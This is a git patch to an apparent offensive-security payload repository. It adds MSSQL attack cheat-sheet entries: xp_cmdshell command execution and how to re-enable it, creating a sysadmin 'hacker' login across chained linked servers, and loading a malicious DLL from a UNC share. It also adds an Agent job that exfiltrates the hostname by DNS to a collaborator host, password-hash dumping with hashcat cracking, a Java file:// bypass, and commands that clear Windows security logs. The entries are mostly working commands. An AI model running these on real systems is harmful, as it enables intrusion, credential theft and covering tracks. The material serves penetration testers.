From 4abd52697f2fb9be94e0d785c77e4af5119efcd0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 10 Mar 2022 11:05:17 +0100 Subject: [PATCH] MSSQL Agent Command Execution --- Directory Traversal/README.md | 10 ++ .../Active Directory Attack.md | 7 +- .../MSSQL Server - Cheatsheet.md | 99 +++++++++++++++++-- .../Windows - Persistence.md | 8 ++ SQL Injection/MSSQL Injection.md | 2 +- 5 files changed, 113 insertions(+), 13 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index e459021..665af6c 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### Java Bypass + +Bypass Java's URL protocol + +```powershell +url:file:///etc/passwd +url:http://127.0.0.1:8080 +``` + + ## Path Traversal ### Interesting Linux files diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ef83864..5df6bc9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1264,9 +1264,9 @@ lsadump::lsa /inject /name:krbtgt Useful when you want to have the clear text password or when you need to make stats about weak passwords. Recommended wordlists: -- rockyou (available in Kali Linux) -- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- Weakpass.com +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) ```powershell @@ -1282,7 +1282,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- ~~[hashes.org](https://hashes.org/check.php)~~ - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 7c693f0..cfd9e9c 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -14,6 +14,8 @@ * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) * [Dump common information from server to files](#dump-common-information-from-server-to-files) * [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) * [Query Version of Linked Database](#query-version-of-linked-database) @@ -22,7 +24,7 @@ * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) - * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) * [Extended Stored Procedure](#extended-stored-procedure) * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) @@ -130,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv ## Linked Database +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ### Crawl Links for Instances in the Domain A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results @@ -195,28 +222,63 @@ Get-SQLQuery -Instance "" -Query "select * from openque ``` -### Command Execution via xp_cmdshell +## Command Execution via xp_cmdshell > xp_cmdshell disabled by default since SQL Server 2005 ```ps1 -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami -Creates and adds local user backup to the local administrators group: -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add' -Verbose -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose ``` +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + ## Extended Stored Procedure ### Add the extended stored procedure and list extended stored procedures ```ps1 +# Create evil DLL Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing Get-SQLStoredProcedureXP -Instance "" -Verbose ``` +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 'xp_calc' + ``` + ## CLR Assemblies Prerequisites: @@ -322,6 +384,8 @@ GO ## OLE Automation +* :warning: Disabled by default + ### Execute commands using OLE automation procedures ```ps1 @@ -365,9 +429,21 @@ Subsystem Options: –Subsystem Jscript ``` +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + ### List All Jobs ```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` @@ -541,7 +617,13 @@ SELECT SYSTEM_USER ### MSSQL Accounts and Hashes ```sql -SELECT name, password_hash FROM sys.sql_logins +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` @@ -557,4 +639,5 @@ Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat. * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) -* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5e3c9a2..e6a93a0 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -8,6 +8,7 @@ * [Antivirus Removal](#antivirus-removal) * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) + * [Clear System and Security Logs](#clear-system-and-security-logs) * [Simple User](#simple-user) * [Registry HKCU](#registry-hkcu) * [Startup](#startup) @@ -87,6 +88,13 @@ NetSh Advfirewall set allprofiles state off New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP ``` +### Clear System and Security Logs + +```powershell +cmd.exe /c wevtutil.exe cl System +cmd.exe /c wevtutil.exe cl Security +``` + ## Simple User Set a file as hidden diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 1ee72f9..920e2ac 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -96,7 +96,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` ## MSSQL Union Based